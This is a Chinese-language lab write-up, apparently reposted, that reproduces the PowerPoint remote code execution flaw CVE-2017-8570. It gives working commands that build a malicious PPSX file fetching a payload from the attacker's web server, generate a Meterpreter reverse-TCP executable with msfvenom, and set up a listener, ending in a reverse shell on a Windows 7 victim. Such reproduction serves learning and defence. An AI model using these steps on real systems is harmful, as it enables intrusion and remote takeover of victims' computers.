Office CVE-2017-8570 远程代码执行漏洞复现

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Office CVE-2017-8570 远程代码执行漏洞复现相关的知识,希望对你有一定的参考价值。

最近在学习kali的相关使用,朋友说不如就复现cve-2017-8570吧,我欣然答应。


0x00介绍
CVE-2017-8570是一个逻辑漏洞,成因是Microsoft PowerPoint执行时会初始化“script”Moniker对象,而在PowerPoint播放动画期间会激活该对象,从而执行sct脚本(Windows Script Component)文件。攻击者可以诱导用户运行恶意PPT文件,便可获取和当前登陆用户相同的执行权限,该漏洞利用方法简单影响范围广。
0X01影响版本
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
0x02复现
攻击者
操作系统:kali2018
IP:192.168.40.22
受害者
操作系统:win7 x64(office 2007)
IP:192.168.40.159

  1. 我们下载好利用的exp之后,解压打开里面的README.md。进入文件目录输入:cat README.md里面详细讲了操作步骤,讲真readme真的好用。如图:注意图中红框中的ip地址,均为攻击者的ip地址。
    技术分享图片
  2. 按照上图步骤进行第一步:生成恶意的PPSX文件
    python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.40.22/logo.doc
    技术分享图片
  3. 第二步:生成反弹shell的exe文件,注意这里要是是64位系统,需要在windows后面加x64
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.40.22 LPORT=4444 -f exe > /var/www/html/shell.exe
    技术分享图片
  4. 第三步:开启msf的监听
    技术分享图片
  5. 第四步:生成监听来自ppsx执行反弹shell,自动开启80端口,注意这里的shell文件路径要和之前生成的文件路径一样。不过在进行这一步之前,我先将生成的Incoice.ppsx文件移到/var/www/html下,然后开启Apache服务,本机访问192.168.40.22/Incoice.ppsx,将恶意文件下载下来,随后关闭Apache服务。
    技术分享图片
    技术分享图片
    技术分享图片
    此时这里已经可以看到received request for payload from 192.168.40.159,因为我是运行恶意文件之后截的图。
  6. 受害者打开ppsx文件,即可看到成功反弹shell。期间失败过,shell反弹不了,第二天再试的时候就好了,具体原因就归类于自己粗心吧~~~
    技术分享图片
    到此为止就已经成功复现该漏洞了。细心+不放弃=成功!

以上是关于Office CVE-2017-8570 远程代码执行漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章

Office--CVE-2017-11882远程代码执行

Office远程代码执行漏洞CVE-2017-0199复现

隐藏17年的Office远程代码执行漏洞(CVE-2017-11882)

CVE-2017-11882-Office远程代码执行漏洞复现

Office 365 远程登录命令

cve-2017-11882生成office恶意文件